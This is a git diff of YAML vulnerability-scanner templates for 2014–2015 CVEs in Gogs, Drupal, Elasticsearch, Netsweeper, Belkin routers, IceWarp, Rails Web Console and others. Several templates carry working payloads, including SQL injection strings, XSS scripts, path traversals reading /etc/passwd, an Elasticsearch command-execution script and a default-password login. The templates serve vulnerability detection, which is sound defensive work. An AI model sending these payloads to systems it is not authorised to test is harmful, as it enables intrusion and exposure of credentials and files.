100644 index 79f240dc79..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-8682.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2014-8682 - -info: - name: Gogs (Go Git Service) - SQL Injection - author: dhiyaneshDK,daffainfo - severity: high - description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-8682 - - http://seclists.org/fulldisclosure/2014/Nov/33 - - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html - - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d - - https://www.exploit-db.com/exploits/35238 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2014-8682 - cwe-id: CWE-89 - metadata: - shodan-query: title:"Sign In - Gogs" - tags: cve,cve2014,sqli,gogs - -requests: - - method: GET - path: - - '{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"ok":true' - - '"data"' - - '"repolink":"' - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2014/CVE-2014-9094.yaml b/nuclei-templates/CVE-2014/CVE-2014-9094.yaml deleted file mode 100644 index fbb3bd8bc1..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-9094.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: CVE-2014-9094 -info: - name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting - author: daffainfo - severity: medium - description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." - reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 - tags: cve,cve2014,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2014/CVE-2014-9614.yaml b/nuclei-templates/CVE-2014/CVE-2014-9614.yaml new file mode 100644 index 0000000000..b71a33cd9c --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-9614.yaml @@ -0,0 +1,47 @@ +id: CVE-2014-9614 + +info: + name: Netsweeper 4.0.5 - Default Weak Account + author: daffainfo + severity: critical + description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + - https://nvd.nist.gov/vuln/detail/CVE-2014-9614 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2014-9614 + cwe-id: CWE-798 + tags: cve,cve2021,netsweeper,default-login + +requests: + - raw: + - | + POST /webadmin/auth/verification.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Referer: {{BaseURL}}/webadmin/start/ + + login=branding&password=branding&Submit=Login + + matchers-condition: and + matchers: + - type: status + status: + - 302 + + - type: word + part: header + words: + - 'Location: ../common/' + - 'Location: ../start/' + condition: or + + - type: word + part: header + words: + - 'Set-Cookie: webadminU=' + +# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/CVE-2014-9618.yaml b/nuclei-templates/CVE-2014/CVE-2014-9618.yaml new file mode 100644 index 0000000000..189837b5af --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-9618.yaml @@ -0,0 +1,40 @@ +id: CVE-2014-9618 + +info: + name: Netsweeper - Authentication Bypass + author: daffainfo + severity: critical + description: | + The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL. + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + - https://nvd.nist.gov/vuln/detail/CVE-2014-9618 + - https://www.exploit-db.com/exploits/37933/ + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2014-9618 + cwe-id: CWE-287 + tags: cve,cve2014,netsweeper,auth-bypass + +requests: + - method: GET + path: + - '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url=' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'name=formtag action="../clientlogin/?srid=&action=showdeny&url="' + - 'placeholder="Profile Manager">' + - 'Netsweeper WebAdmin' + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2014/CVE-2014-2321.yaml b/nuclei-templates/CVE-2014/cve-2014-2321.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-2321.yaml rename to nuclei-templates/CVE-2014/cve-2014-2321.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-2383.yaml b/nuclei-templates/CVE-2014/cve-2014-2383.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-2383.yaml rename to nuclei-templates/CVE-2014/cve-2014-2383.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-2962.yaml b/nuclei-templates/CVE-2014/cve-2014-2962.yaml new file mode 100644 index 0000000000..2456af7a2e --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-2962.yaml @@ -0,0 +1,25 @@ +id: CVE-2014-2962 + +info: + name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal + author: daffainfo + severity: high + description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + reference: https://www.exploit-db.com/exploits/38488 + tags: cve,cve2014,lfi,router,firmware,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-3120.yaml b/nuclei-templates/CVE-2014/cve-2014-3120.yaml deleted file mode 100644 index 2e3eb0f6e1..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-3120.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2014-3120 - -info: - name: ElasticSearch v1.1.1/1.2 RCE - author: pikpikcu - severity: critical - description: | - The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. - reference: - - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 - - https://www.elastic.co/blog/logstash-1-4-3-released - tags: cve,cve2014,elastic,rce,elasticsearch - -requests: - - raw: - - | - POST /_search?pretty HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Language: en - Content-Type: application/x-www-form-urlencoded - - { - "size": 1, - "query": { - "filtered": { - "query": { - "match_all": { - } - } - } - }, - "script_fields": { - "command": { - "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();" - } - } - } - - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - - - type: regex - regex: - - "root:.*:0:0" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-3704.yaml b/nuclei-templates/CVE-2014/cve-2014-3704.yaml deleted file mode 100644 index 883f72ee3c..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-3704.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2014-3704 -info: - name: Drupal Sql Injetion - author: princechaddha - severity: high - description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys. - reference: - - https://www.drupal.org/SA-CORE-2014-005 - - http://www.exploit-db.com/exploits/34984 - - http://www.exploit-db.com/exploits/34992 - - http://www.exploit-db.com/exploits/34993 - - http://www.exploit-db.com/exploits/35150 - tags: cve,cve2014,drupal,sqli - -requests: - - method: POST - path: - - "{{BaseURL}}/?q=node&destination=node" - body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a' - - matchers-condition: and - matchers: - - type: status - status: - - 500 - - - type: word - words: - - "PDOException" - - "e807f1fcf82d132f9bb018ca6738a19f" - condition: and - part: body diff --git a/nuclei-templates/CVE-2014/cve-2014-5111.yaml b/nuclei-templates/CVE-2014/cve-2014-5111.yaml deleted file mode 100644 index 36a72b9429..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-5111.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2014-5111 - -info: - name: Fonality trixbox - Directory Traversal - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. - reference: | - - https://www.exploit-db.com/exploits/39351 - - https://www.cvedetails.com/cve/CVE-2014-5111 - tags: cve,cve2014,lfi,trixbox - -requests: - - method: GET - path: - - "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-6308.yaml b/nuclei-templates/CVE-2014/cve-2014-6308.yaml deleted file mode 100644 index 7b52384af9..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-6308.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2014-6308 - -info: - name: Osclass Security Advisory 3.4.1 - Local File Inclusion - author: daffainfo - severity: high - reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html - tags: cve,cve2014,lfi - description: "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php." - -requests: - - method: GET - path: - - "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-8682.yaml b/nuclei-templates/CVE-2014/cve-2014-8682.yaml new file mode 100644 index 0000000000..54f4490459 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-8682.yaml @@ -0,0 +1,36 @@ +id: CVE-2014-8682 + +info: + name: Gogs - 'users'/'repos' '?q' SQL Injection + author: dhiyaneshDK + severity: high + description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. + reference: + - http://www.securityfocus.com/bid/71187 + - http://seclists.org/fulldisclosure/2014/Nov/33 + - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html + - http://gogs.io/docs/intro/change_log.html + - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d + - http://www.exploit-db.com/exploits/35238 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694 + - http://www.securityfocus.com/archive/1/533995/100/0/threaded + tags: cve,cve2014,sqli,gogs + metadata: + shodan-query: 'title:"Sign In - Gogs"' + +requests: + - method: GET + path: + - '{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27' + + matchers-condition: and + matchers: + - type: word + words: + - '"ok":true' + - '"data"' + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-9614.yaml b/nuclei-templates/CVE-2014/cve-2014-9614.yaml deleted file mode 100644 index 19acbf289c..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-9614.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2014-9614 - -info: - name: Netsweeper 4.0.5 - Default Weak Account - author: daffainfo - severity: critical - description: The Web Panel in Netsweeper before 4.0.5 has a default password of branding for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. - reference: - - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - - https://nvd.nist.gov/vuln/detail/CVE-2014-9614 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2014-9614 - cwe-id: CWE-798 - tags: cve,cve2021,netsweeper,default-login - -requests: - - raw: - - | - POST /webadmin/auth/verification.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Referer: {{BaseURL}}/webadmin/start/ - - login=branding&password=branding&Submit=Login - - matchers-condition: and - matchers: - - type: status - status: - - 302 - - - type: word - part: header - words: - - 'Location: ../common/' - - 'Location: ../start/' - condition: or - - - type: word - part: header - words: - - 'Set-Cookie: webadminU=' diff --git a/nuclei-templates/CVE-2014/CVE-2014-9615.yaml b/nuclei-templates/CVE-2014/cve-2014-9615.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-9615.yaml rename to nuclei-templates/CVE-2014/cve-2014-9615.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-9618.yaml b/nuclei-templates/CVE-2014/cve-2014-9618.yaml deleted file mode 100644 index 0fc0c1d536..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-9618.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2014-9618 - -info: - name: Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation) - author: daffainfo - severity: critical - description: The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL. - reference: - - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - - https://nvd.nist.gov/vuln/detail/CVE-2014-9618 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2014-9618 - cwe-id: CWE-287 - tags: cve,cve2014,netsweeper,auth-bypass - -requests: - - method: GET - path: - - '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url=' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'name=formtag action="../clientlogin/?srid=&action=showdeny&url="' - - 'placeholder="Profile Manager">' - - 'Netsweeper WebAdmin' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-0554.yaml b/nuclei-templates/CVE-2015/CVE-2015-0554.yaml deleted file mode 100644 index 80943c3214..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-0554.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2015-0554 - -info: - name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure - author: daffainfo - severity: high - description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. - reference: - - https://www.exploit-db.com/exploits/35721 - - https://nvd.nist.gov/vuln/detail/CVE-2015-0554 - - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html - - http://www.exploit-db.com/exploits/35721 - classification: - cve-id: CVE-2015-0554 - tags: cve,cve2015,pirelli,router,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/wlsecurity.html" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "var wpapskkey" - - "var WscDevPin" - - "var sessionkey" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-1427.yaml b/nuclei-templates/CVE-2015/CVE-2015-1427.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-1427.yaml rename to nuclei-templates/CVE-2015/CVE-2015-1427.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-1503.yaml b/nuclei-templates/CVE-2015/CVE-2015-1503.yaml new file mode 100644 index 0000000000..7cb0459ae6 --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-1503.yaml @@ -0,0 +1,32 @@ +id: CVE-2015-1503 +info: + name: IceWarp Mail Server Directory Traversal + author: 0x_Akoko + severity: high + description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability. + reference: + - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html + - https://nvd.nist.gov/vuln/detail/CVE-2015-1503 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-1503 + cwe-id: CWE-200 + tags: cve,cve2015,icewarp,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd" + - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-2080.yaml b/nuclei-templates/CVE-2015/CVE-2015-2080.yaml new file mode 100644 index 0000000000..adcfc5fbbd --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-2080.yaml @@ -0,0 +1,39 @@ +id: CVE-2015-2080 + +info: + name: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage + author: pikpikcu + severity: high + description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header. + reference: + - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md + - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html + - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html + - https://nvd.nist.gov/vuln/detail/CVE-2015-2080 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-2080 + cwe-id: CWE-200 + tags: cve,cve2015,jetty,packetstorm + metadata: + max-request: 1 + +http: + - method: POST + path: + - "{{BaseURL}}" + headers: + Referer: \x00 + + matchers-condition: and + matchers: + - type: status + status: + - 400 + - type: word + words: + - "Illegal character 0x0 in state" + part: body + +# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2015/CVE-2015-3224.yaml b/nuclei-templates/CVE-2015/CVE-2015-3224.yaml new file mode 100644 index 0000000000..157fd2451d --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-3224.yaml @@ -0,0 +1,38 @@ +id: CVE-2015-3224 +info: + name: Ruby on Rails Web Console - Remote Code Execution + author: pdteam + severity: critical + description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. + reference: + - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ + - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ + - https://hackerone.com/reports/44513 + - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 + classification: + cve-id: CVE-2015-3224 + tags: cve,cve2015,rce,rails,ruby +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + headers: + X-Forwarded-For: ::1 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Rails.root:" + - "Action Controller: Exception caught" + condition: and + - type: word + part: response + words: + - "X-Web-Console-Session-Id" + - "data-remote-path=" + - "data-session-id=" + case-insensitive: true + condition: or + +# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2015/CVE-2015-3648.yaml b/nuclei-templates/CVE-2015/CVE-2015-3648.yaml deleted file mode 100644 index c1cac6dd15..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-3648.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2015-3648 - -info: - name: ResourceSpace - Local File inclusion - author: pikpikcu - severity: high - description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. - reference: - - https://vulners.com/cve/CVE-2015-3648/ - - https://www.securityfocus.com/bid/75019 - - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738 - - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html - classification: - cve-id: CVE-2015-3648 - tags: cve,cve2015,lfi,resourcespace - -requests: - - method: GET - path: - - "{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-4050.yaml b/nuclei-templates/CVE-2015/CVE-2015-4050.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-4050.yaml rename to nuclei-templates/CVE-2015/CVE-2015-4050.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-4666.yaml b/nuclei-templates/CVE-2015/CVE-2015-4666.yaml deleted file mode 100644 index 0b7f8ae662..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-4666.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2015-4666 -info: - name: Xceedium Xsuite 2.4.4.5 - Directory Traversal - author: 0x_Akoko - severity: high - description: Directory traversal vulnerability in opm/read_sessionlog.php in Xceedium Xsuite 2.4.4.5 and earlier allows remote attackers to read arbitrary files in the logFile parameter. - reference: - - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt - - https://www.cvedetails.com/cve/CVE-2015-4666 - - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html - - http://www.modzero.ch/advisories/MZ-15-02-Xceedium-Xsuite.txt - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2015-4666 - cwe-id: CWE-22 - tags: cve,cve2015,xceedium,xsuite,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-4668.yaml b/nuclei-templates/CVE-2015/CVE-2015-4668.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-4668.yaml rename to nuclei-templates/CVE-2015/CVE-2015-4668.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-5688.yaml b/nuclei-templates/CVE-2015/CVE-2015-5688.yaml new file mode 100644 index 0000000000..91b6573794 --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-5688.yaml @@ -0,0 +1,30 @@ +id: CVE-2015-5688 + +info: + name: Geddy before v13.0.8 LFI + author: pikpikcu + severity: high + description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. + reference: + - https://nodesecurity.io/advisories/geddy-directory-traversal + - https://github.com/geddy/geddy/issues/697 + - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231 + classification: + cve-id: CVE-2015-5688 + tags: cve,cve2015,geddy,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-6477.yaml b/nuclei-templates/CVE-2015/CVE-2015-6477.yaml new file mode 100644 index 0000000000..4baf4015a5 --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-6477.yaml @@ -0,0 +1,28 @@ +id: CVE-2015-6477 + +info: + name: Nordex NC2 'username' Parameter XSS + description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://seclists.org/fulldisclosure/2015/Dec/117 + - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 + author: nithissh + severity: medium + tags: cve,cve2015,xss,iot,nordex,nc2 + +requests: + - method: POST + path: + - "{{BaseURL}}/login" + body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en' + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + - type: word + part: body + words: + - "" diff --git a/nuclei-templates/CVE-2015/cve-2015-7780.yaml b/nuclei-templates/CVE-2015/CVE-2015-7780.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-7780.yaml rename to nuclei-templates/CVE-2015/CVE-2015-7780.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-8399.yaml b/nuclei-templates/CVE-2015/CVE-2015-8399.yaml deleted file mode 100644 index 907864b58b..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-8399.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2015-8399 - -info: - name: Atlassian Confluence configuration files read - author: princechaddha - severity: medium - 